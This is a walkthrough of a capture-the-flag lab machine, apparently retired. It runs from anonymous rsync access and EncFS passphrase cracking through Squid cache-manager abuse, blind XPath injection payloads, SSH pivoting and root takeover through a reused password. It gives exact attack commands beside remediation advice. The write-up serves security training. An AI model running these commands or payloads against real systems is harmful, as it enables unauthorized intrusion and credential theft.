Unbalanced
Summary
I scanned Conquest Unbalanced ($TARGET) and discovered three services: SSH, an rsync daemon, and a Squid HTTP proxy. The rsync daemon accepted anonymous connections and exposed an EncFS-encrypted Squid configuration backup; cracking the encryption passphrase with a common wordlist revealed the Squid management password and evidence of a private intranet application reachable only through the proxy.
Querying Squid's built-in management interface with the recovered password exposed the private IP addresses of hidden backend servers, and blind XPath injection in their PHP login form allowed user 'bryan's password to be extracted character by character. An SSH session as bryan surfaced a locally-bound Pi-hole Docker administration console; a world-readable provisioning script on the host stored the Pi-hole admin password in plaintext, and that same password had been reused identically as the host operating-system root account password — a single su command completed the takeover.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export INTERNAL_HOST="<another-host-reached-after-pivoting>"
export INTERNAL_HOST2="<another-host-reached-after-pivoting>"
export PASSWORD="<a-password-you-choose>"
export PASSWORD2="<a-password-you-choose>"
export PASSWORD4="<a-password-you-choose>"
export PASSWORD5="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 2
nmap -Pn -sV -p22,873,3128 $TARGETnmap -Pn -p873 --script rsync-list-modules $TARGETExact commands 2
rsync rsync://$TARGET/rsync -av rsync://$TARGET/conf_backups/ ./conf_backups/FixRequire authentication for all rsync modulesHigh
Exact commands 4
python3 /usr/share/john/encfs2john.py ./conf_backups > encfs.hashjohn --wordlist=/usr/share/wordlists/rockyou.txt encfs.hashprintf '$PASSWORD4\n' | encfs --stdinpass $(pwd)/conf_backups $(pwd)/cleargrep -E 'cachemgr_passwd|intranet|http_access' ./clear/squid.confFixEliminate plaintext credentials from backup archives and use strong encryption passphrasesHigh
Exact commands 3
curl -u ':$PASSWORD5' http://$TARGET:3128/squid-internal-mgr/fqdncachecurl -x http://$TARGET:3128 http://intranet.unbalanced.htb/curl -x http://$TARGET:3128 http://$INTERNAL_HOST/intranet.phpFixRestrict Squid's cache-manager interface to localhost onlyMedium
Exact commands 3
curl -x http://$TARGET:3128 -s -o /dev/null -w '%{size_download}' -d "Username=bryan' and 1=1 or 'a'='a&Password=x" http://$INTERNAL_HOST/intranet.phpcurl -x http://$TARGET:3128 -s -o /dev/null -w '%{size_download}' -d "Username=bryan' and 1=2 or 'a'='b&Password=x" http://$INTERNAL_HOST/intranet.phppython3 xpath_brute.pyFixUse parameterised queries in the intranet login form to prevent XPath injectionCritical
Exact commands 2
sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null bryan@$TARGET 'id; hostname; cat /home/bryan/user.txt'sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null bryan@$TARGET 'cat ~/TODO'Exact commands 3
ssh -f -N -L 18081:127.0.0.1:8080 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null bryan@$TARGETfind / -name 'pihole_config.sh' -perm -o+r 2>/dev/nullcat /root/pihole_config.shFixRestrict file permissions on scripts and config files that contain service credentialsHigh
Exact commands 1
sshpass -p "$PASSWORD" ssh -tt -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null bryan@$TARGET "printf '%s\n' '$PASSWORD2' | su - root -c 'id; hostname; cat /root/root.txt'"FixUse a unique password for each service and OS account — never reuse credentialsCritical
Attack patterns used
The transferable techniques behind this compromise.
Password / Credential ReuseCredential Access · Lateral MovementT1078
What it is
A password recovered from one place — a config file, a database, a cracked hash, a service account — is tried against other accounts and services (SSH, SMB, WinRM, sudo, the database, the next host). Reuse turns a single leaked secret into broad access.
Why it works
Humans and deployments reuse passwords across accounts and tiers, and lateral movement thrives on it. Remediate with unique credentials per account/service, a password manager/vault, and MFA on remote-access services.
Read more
Exposed services
| 22/tcp | ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 873/tcp | rsync |
| 3128/tcp | http-proxy Squid http proxy 4.6 |